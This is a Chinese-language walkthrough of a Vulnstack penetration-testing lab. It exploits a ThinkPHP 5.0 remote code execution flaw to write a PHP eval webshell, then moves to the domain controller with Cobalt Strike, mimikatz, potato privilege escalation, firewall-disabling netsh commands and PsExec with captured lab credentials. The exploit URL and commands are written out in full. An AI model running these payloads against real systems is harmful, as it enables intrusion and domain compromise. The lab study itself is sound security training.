1.環境搭建

靶機下載地址:http://vulnstack.qiyuanxuetang.net/vuln/
win7（雙網絡卡）：
192.168.135.150（外網）
192.168.138.136（內網）
外網使用NAT模式，內網僅主機模式。

win2008:

2.外網資訊收集

2.1訪問目標網站發現是個TP框架的站。

2.2版本判斷

通過報錯得知TP的詳細版本

2.3進行目錄掃描

拿伺服器許可權

1.當我們確認框架和具體版本後，就可以尋找框架對應的歷史漏洞poc。

ThinkPhp5.0任意程式碼執行：https://www.cnblogs.com/backlion/p/10106676.html

2.嘗試寫入shell

http://192.168.135.150/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_GET["code"]);?^>>shell.php
成功的話會寫入到public目錄下，然後訪問一下shell.php就拿蟻劍連線。

然後就進入到我們的內網了

3.內網資訊收集

1.檢視一下許可權

如果許可權較低的話就要提權，可以systeminfo檢視補丁資訊然後尋找對應的EXP進行提權。

3.1存活主機

4橫向滲透

4.1先開啟Cobalt Strike然後讓win7上線

4.2minikatz嘗試讀取密碼

4.3找域控制器

內網掃描存活主機

ipconfig -all 發現DNS字尾為sun.com這一般是域控制器的域名

ping一下得到ip

就可以確定192.168.138.138的主機就是域控制器了

5拿域控

5.1提權

先把win7的administrator許可權提升為system，這裡使用爛土豆，成功提權SYStem

5.2psexec傳遞

因為域控是不與外網進行接觸的，所以要先在已經上線的主機上建立一個listen

然後生成一個Executable(S)木馬，上傳到win7上

因為自帶的psexec只可以在目標可以訪問外網的情況下使用所以這我們還要自己上傳一個psexec.exe

因為win7的防火牆緣故，7777埠是進不去的可以，關閉防火牆:NetSh Advfirewall set allprofiles state off ，或者新增規則來放行7777埠

netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=7777

最後使用上傳的psexec加上抓取的明文密碼配合exe成功上線域控。

Shell C:\phpStudy\PHPTutorial\WWW\public\PsExec64.exe -accepteula \\192.168.138.138 -u sun\Administrator -p WW123123ww. -d -c C:\phpStudy\PHPTutorial\WWW\public\nei.exe
(psexec的用法)[https://blog.csdn.net/jamesdodo/article/details/81743224]

總結：
先說遇到的坑：system的許可權讀取密碼和執行psexec老報錯，administrator就很順利，不曉得是靶機的問題還是我自己搭建的環境有問題。
充環境搭建到域控上線用了兩天太菜了，不過好在學到了一些東西，加油！！